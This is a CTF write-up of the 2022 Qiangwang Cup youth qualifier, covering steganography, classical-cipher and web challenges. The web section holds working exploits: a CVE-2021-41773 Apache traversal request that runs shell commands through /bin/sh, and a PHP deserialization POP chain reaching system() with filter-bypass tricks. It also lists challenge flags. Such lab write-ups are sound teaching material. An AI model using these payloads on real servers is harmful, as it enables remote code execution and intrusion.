2022 Qiangwang Cup (强网杯) Youth Division Qualifier Write-up

admin, 2022-09-21 23:57:24, CTF section


misc

misc1

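Do you know what the "universal chord" is?

Unzipping the archive gives base64 data.

Decoding the base64 shows a PNG whose bytes are reversed in groups of two.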


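import base64

# Read the base64 text and decode it to raw bytes
with open('chuyinweilai.png', 'r') as f:
    fr = base64.b64decode(f.read())

# Reverse every 2-byte group to restore the original PNG byte order
png = b''
for i in range(0, len(fr), 2):
    png += fr[i:i+2][::-1]

with open('resa.png', 'wb') as fw:
    fw.write(png)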

The script above exports the PNG.


Searching for the "wealth code" of music gives:


4536251

The PNG carries password-protected hidden data.

Use cloacked-pixel:


python lsb.py extract res.png 11.txt 4536251


flag{5cc0aa21208b517dbd0bde650247237f}

misc3

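Steganography is the art and science of hiding information. Hidden information looks like something else. Steganography differs from encryption: encrypted data is something you cannot read, while steganographic data is something you seem to be able to read. Here, one of the simplest steganographic methods has been used to hide some information. Can you find it?

The challenge file is a PNG.

Viewed in 010 Editor, it is actually a JPG; at the end of the file there is a ZIP and a line of text: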


7his_1s_p4s5w0rd

Extracting the ZIP gives a PNG.

secret.png is password-protected; again the classic cloacked-pixel:


python2 lsb.py extract secret.png 3.txt 7his_1s_p4s5w0rd


flag{2e55f884-ef01-4654-87b1-cc3111800085}
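The manual 010 Editor check above (wrong extension, ZIP and text appended after the image) can be automated. The following is an added example, not part of the original write-up: it identifies the real format from magic bytes and carves an appended ZIP by reading the ZIP end-of-central-directory record. The sample file is constructed in memory; only the trailing text and the name secret.png come from the write-up, and the function names are illustrative.

```python
import io
import struct
import zipfile

JPEG_SOI = b"\xff\xd8\xff"
PNG_SIG = b"\x89PNG\r\n\x1a\n"
EOCD_SIG = b"PK\x05\x06"  # ZIP end-of-central-directory record

def real_type(data):
    """Identify the format from magic bytes, ignoring the file extension."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(JPEG_SOI):
        return "jpeg"
    return "unknown"

def carve_appended_zip(data):
    """Return (zip_bytes, trailing_bytes) for a ZIP appended to a host file."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        return b"", b""
    # EOCD fields: central-directory size (+12), its offset (+16), comment length (+20)
    cd_size, cd_offset, comment_len = struct.unpack_from("<IIH", data, eocd + 12)
    start = eocd - cd_size - cd_offset  # archive start inside the host file
    end = eocd + 22 + comment_len       # the EOCD is 22 bytes plus its comment
    return data[start:end], data[end:]

def build_sample():
    """Constructed stand-in: JPEG bytes, then a ZIP, then a line of text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("secret.png", PNG_SIG + b"constructed image data")
    jpeg = JPEG_SOI + b"\xe0" + b"\x00" * 16 + b"\xff\xd9"
    return jpeg + buf.getvalue() + b"7his_1s_p4s5w0rd"

def examine(data):
    """Return (real type, names inside the appended ZIP, trailing text)."""
    zip_bytes, trailer = carve_appended_zip(data)
    names = []
    if zip_bytes:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            names = zf.namelist()
    return real_type(data), names, trailer.decode("latin-1")

if __name__ == "__main__":
    print(examine(build_sample()))
```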

crypto

crypto1

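Garbled text with no apparent rules: how should it be analyzed?

The input is a pile of As and Bs with line breaks and spaces, so the guess is Morse code.

Replace B with . and A with -; decoding gives: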


 BKJOGDTKFOEJ PV GEX OKFBGPBX FSM VGRMJ DI GXBESPZRXV IDK VXBRKX BDHHRSPBFGPDS PS GEX OKXVXSBX DI FMCXKVFKPFW QXEFCPDK, NEPBE PV MPCPMXM PSGD BWFVVPBFW BKJOGDTKFOEJ FSM HDMXKS BKJOGDTKFOEJ. GEX HFPS BWFVVPBFW BPOEXK GJOXV FKX GKFSVODVPGPDS BPOEXKV, NEPBE KXFKKFSTX GEX DKMXK DI WXGGXKV PS F HXVVFTX. FS XFKWJ VRQVGPGRGPDS BPOEXK NFV GEX BFXVFK BPOEXK, PS NEPBE XFBE WXGGXK PS GEX OWFPSGXYG NFV KXOWFBXM QJ F WXGGXK VDHX IPYXM SRHQXK DI ODVPGPDSV IRKGEXK MDNS GEX FWOEFQXG. VPSBX GEX MXCXWDOHXSG DI KDGDK BPOEXK HFBEPSXV PS NDKWM NFK P FSM GEX FMCXSG DI BDHORGXKV PS NDKWM NFK PP, BKJOGDTKFOEJ HXGEDMV EFCX QXBDHX PSBKXFVPSTWJ BDHOWXY FSM PGV FOOWPBFGPDSV HDKX CFKPXM. HDMXKS BKJOGDTKFOEJ PV EXFCPWJ QFVXM DS HFGEXHFGPBFW GEXDKJ FSM BDHORGXK VBPXSBX OKFBGPBX; BKJOGDTKFOEPB FWTDKPGEHV FKX MXVPTSXM FKDRSM BDHORGFGPDSFW EFKMSXVV FVVRHOGPDSV. GEX TKDNGE DI BKJOGDTKFOEPB GXBESDWDTJ EFV KFPVXM F SRHQXK DI WXTFW PVVRXV PS GEX PSIDKHFGPDS FTX. BKJOGDTKFOEJ'V ODGXSGPFW IDK RVX FV F GDDW IDK XVOPDSFTX FSM VXMPGPDS EFV WXM HFSJ TDCXKSHXSGV GD BWFVVPIJ PG FV F NXFODS FSM GD WPHPG DK XCXS OKDEPQPG PGV RVX FSM XYODKG. PS VDHX ARKPVMPBGPDSV NEXKX GEX RVX DI BKJOGDTKFOEJ PV WXTFW, WFNV OXKHPG PSCXVGPTFGDKV GD BDHOXW GEX MPVBWDVRKX DI XSBKJOGPDS LXJV IDK MDBRHXSGV KXWXCFSG GD FS PSCXVGPTFGPDS. BKJOGDTKFOEJ FWVD OWFJV F HFADK KDWX PS MPTPGFW KPTEGV HFSFTXHXSG FSM BDOJKPTEG PSIKPSTXHXSG MPVORGXV PS KXTFKM GD MPTPGFW HXMPF.GEX IWFT PV 1M817I23-4X20-9405-QI6M-X83M055316M6, OWXFVX FMM IWFT VGKPST FSM QKFBXV JDRKVXWI, FSM FWW WXGGXKV FKX WDNXKBFVX.

Use quipqiup to run statistical letter-frequency analysis on this monoalphabetic substitution cipher:


    CRYPTOGRAPHY IS THE PRACTICE AND STUDY OF TECHNIQUES FOR SECURE COMMUNICATION IN THE PRESENCE OF ADVERSARIAL BEHAVIOR, WHICH IS DIVIDED INTO CLASSICAL CRYPTOGRAPHY AND MODERN CRYPTOGRAPHY. THE MAIN CLASSICAL CIPHER TYPES ARE TRANSPOSITION CIPHERS, WHICH REARRANGE THE ORDER OF LETTERS IN A MESSAGE. AN EARLY SUBSTITUTION CIPHER WAS THE CAESAR CIPHER, IN WHICH EACH LETTER IN THE PLAINTEXT WAS REPLACED BY A LETTER SOME FIXED NUMBER OF POSITIONS FURTHER DOWN THE ALPHABET. SINCE THE DEVELOPMENT OF ROTOR CIPHER MACHINES IN WORLD WAR I AND THE ADVENT OF COMPUTERS IN WORLD WAR II, CRYPTOGRAPHY METHODS HAVE BECOME INCREASINGLY COMPLEX AND ITS APPLICATIONS MORE VARIED. MODERN CRYPTOGRAPHY IS HEAVILY BASED ON MATHEMATICAL THEORY AND COMPUTER SCIENCE PRACTICE; CRYPTOGRAPHIC ALGORITHMS ARE DESIGNED AROUND COMPUTATIONAL HARDNESS ASSUMPTIONS. THE GROWTH OF CRYPTOGRAPHIC TECHNOLOGY HAS RAISED A NUMBER OF LEGAL ISSUES IN THE INFORMATION AGE. CRYPTOGRAPHY'S POTENTIAL FOR USE AS A TOOL FOR ESPIONAGE AND SEDITION HAS LED MANY GOVERNMENTS TO CLASSIFY IT AS A WEAPON AND TO LIMIT OR EVEN PROHIBIT ITS USE AND EXPORT. IN SOME JURISDICTIONS WHERE THE USE OF CRYPTOGRAPHY IS LEGAL, LAWS PERMIT INVESTIGATORS TO COMPEL THE DISCLOSURE OF ENCRYPTION KEYS FOR DOCUMENTS RELEVANT TO AN INVESTIGATION. CRYPTOGRAPHY ALSO PLAYS A MAJOR ROLE IN DIGITAL RIGHTS MANAGEMENT AND COPYRIGHT INFRINGEMENT DISPUTES IN REGARD TO DIGITAL MEDIA.THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.


THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.


flag{1d817f23-4e20-9405-bf6d-e83d055316d6}
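A way to sanity-check the solver output, as an added example that is not part of the original write-up: align the first sentence of the ciphertext with the first sentence of the recovered plaintext, rebuild the letter map, confirm it is one-to-one, and use it to decrypt the flag token. The three strings are copied from the write-up; the function names are illustrative.

```python
# First sentence of the ciphertext and of the quipqiup output, copied from the write-up
CT = ("BKJOGDTKFOEJ PV GEX OKFBGPBX FSM VGRMJ DI GXBESPZRXV IDK VXBRKX "
      "BDHHRSPBFGPDS PS GEX OKXVXSBX DI FMCXKVFKPFW QXEFCPDK")
PT = ("CRYPTOGRAPHY IS THE PRACTICE AND STUDY OF TECHNIQUES FOR SECURE "
      "COMMUNICATION IN THE PRESENCE OF ADVERSARIAL BEHAVIOR")
FLAG_CT = "1M817I23-4X20-9405-QI6M-X83M055316M6"


def recover_key(ct, pt):
    """Build the cipher->plain letter map and reject any inconsistent pairing."""
    if len(ct) != len(pt):
        raise ValueError("texts are not aligned")
    key, inverse = {}, {}
    for c, p in zip(ct, pt):
        if not c.isalpha():
            if c != p:
                raise ValueError(f"non-letter mismatch: {c!r} vs {p!r}")
            continue
        # setdefault keeps the first pairing; a later conflict means the text
        # is not a one-to-one monoalphabetic substitution of the plaintext
        if key.setdefault(c, p) != p or inverse.setdefault(p, c) != c:
            raise ValueError(f"conflict at {c!r} -> {p!r}")
    return key


def decrypt(text, key):
    """Apply the key; letters the known plaintext never covered become '?'."""
    return "".join(key.get(ch, "?") if ch.isalpha() else ch for ch in text)


def flag_from_pair():
    """Decrypt the flag token, lowercase it and add the braces as instructed."""
    key = recover_key(CT, PT)
    return "flag{" + decrypt(FLAG_CT, key).lower() + "}"


if __name__ == "__main__":
    print(flag_from_pair())
```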

crypto2

Crack the message (the final string has the form flag{uuid}).

Decode it as an N-type rail fence cipher with 32 rails:


FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]

Brute-forcing the ROT shift shows that shifts 31 and 32 contain what we want:


Amount = 31: ek`fz7914c2bd-880b-40b0-8167-2e77e3101a44|
Amount = 32: flag{8:25d3ce.991c.51c1.9278.3f88f4212b55}

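But putting the shift-31 result into flag{} was not accepted.

Changing only the - was not right either; in the end, changing only the digits to 32 turned out to be correct: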


flag{7914d2ce-880c-40c0-8167-2f77f3101b44}
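The brute force and the final mix of the two shifts can be reproduced in a few lines. This is an added example, not part of the original write-up; the 94-symbol alphabet (ASCII 33 to 126) and the per-character rule (uppercase ciphertext letters take shift 32, every other symbol takes shift 31) are inferred here from the three strings shown above.

```python
LO, HI = 33, 126      # printable ASCII range, inferred from the outputs above
SPAN = HI - LO + 1    # 94 symbols

CT = "FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]"


def rot_printable(text, amount):
    """Rotate every printable ASCII character by `amount` within 33..126."""
    out = []
    for ch in text:
        code = ord(ch)
        if LO <= code <= HI:
            code = (code - LO + amount) % SPAN + LO
        out.append(chr(code))
    return "".join(out)


def brute_force(text):
    """Return every candidate decoding, keyed by shift amount."""
    return {n: rot_printable(text, n) for n in range(1, SPAN)}


def merge_shifts(text, upper_amount=32, other_amount=31):
    """Shift uppercase letters by one amount and all other symbols by another.

    Adding 32 to an uppercase ASCII letter gives its lowercase form, while
    31 maps this ciphertext's lowercase letters onto digits and '-'.
    """
    return "".join(
        rot_printable(ch, upper_amount if ch.isupper() else other_amount)
        for ch in text
    )


def solve(ct=CT):
    """Decode only the part between the brackets and wrap it as flag{...}."""
    body = ct[ct.index("[") + 1:ct.rindex("]")]
    return "flag{" + merge_shifts(body) + "}"


if __name__ == "__main__":
    for n in (31, 32):
        print(f"Amount = {n}: {brute_force(CT)[n]}")
    print(solve())
```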

web

web1

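Challenge: CVE-2021-41773 is present. Can you get the flag?

Search for CVE-2021-41773.

It turns out to be an Apache HTTP Server vulnerability.

Use the directory traversal to reach a shell and execute a command: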



GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 101.200.76.17:34199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 14

echo;cat /flag


flag{3e08776b-ae03-4c14-9955-684eb744897e}
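From the defender's side, the request above stands out in access logs because its .. segments only appear after percent-decoding the path twice. The following is an added example, not part of the original write-up, that classifies request lines this way; the log lines are constructed, and only the request path in the second line is taken from the write-up.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries (addresses, times, statuses and sizes are made up)
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Sep/2022:10:00:01 +0800] "GET /index.html HTTP/1.1" 200 45',
    '203.0.113.9 - - [21/Sep/2022:10:00:07 +0800] "GET /cgi-bin/.%%32%65/.%%32%65/'
    '.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 43',
    '203.0.113.5 - - [21/Sep/2022:10:00:09 +0800] "GET /docs/v1%2e2/notes.txt HTTP/1.1" 200 10',
    '203.0.113.7 - - [21/Sep/2022:10:00:12 +0800] "GET /static/../index.html HTTP/1.1" 200 45',
]


def fully_decode(path, max_rounds=4):
    """Percent-decode repeatedly; return (decoded_path, rounds_that_changed_it)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(path)
        if nxt == path:
            break
        path, rounds = nxt, rounds + 1
    return path, rounds


def classify(line):
    """Label a log line by whether '..' segments are hidden behind encoding."""
    m = REQ.search(line)
    if not m:
        return "unparsed"
    path = m.group("target").split("?", 1)[0]
    decoded, rounds = fully_decode(path)
    if ".." not in decoded.split("/"):
        return "clean"
    if ".." in path.split("/"):
        return "plain-traversal"      # visible without any decoding
    return f"encoded-traversal(rounds={rounds})"


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), "<-", entry.split('"')[1])
```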

web3


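When unserialize runs, __destruct() is executed. Inside __destruct there is a preg_match that can trigger Range's __toString(), which does return $this->link->horis;. When $this->link is a Water object, this amounts to reading the horis property of the Water class; that class has no horis property, so __get() is called, which does return $function();. When $function is a Circle object, using the object as a function calls __invoke(), which in turn reaches the eval in runc.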


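<?php
// Stub classes: only the property layout matters when building the object graph
class Water{
    public $waterfall;
}
class Circle{
    public $daemon;
    public $dash;
}
class Range{
    public $horis;
    public $link;
}
class Sliver{
    public $secret;
    public $resty;
}
$a = new Sliver();
// echo unserialize($a);
$a->secret = new Range();                    // __toString() is triggered by preg_match in __destruct()
$a->secret->link = new Water();              // reading the missing horis property calls __get()
$a->secret->link->waterfall = new Circle();  // called as a function, so __invoke() runs
$a->secret->link->waterfall->dash = "system('ls');";
echo (serialize($a));
?>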

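After obtaining the serialized string: because dash is a protected property, %00*%00 has to be added to it in the string and the length increased by 3. The last step is to bypass the regex check that runs before deserialization: putting two / in front of demo.php makes parse_url return false, which is enough.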


flag{ab753923-7c1e-41c0-bcdb-532ddb6a0693}


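Originally published on the WeChat official account 齐鲁师院网络安全社团 (Qilu Normal University Network Security Club): 2022 Qiangwang Cup (强网杯) Youth Division Qualifier Write-up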
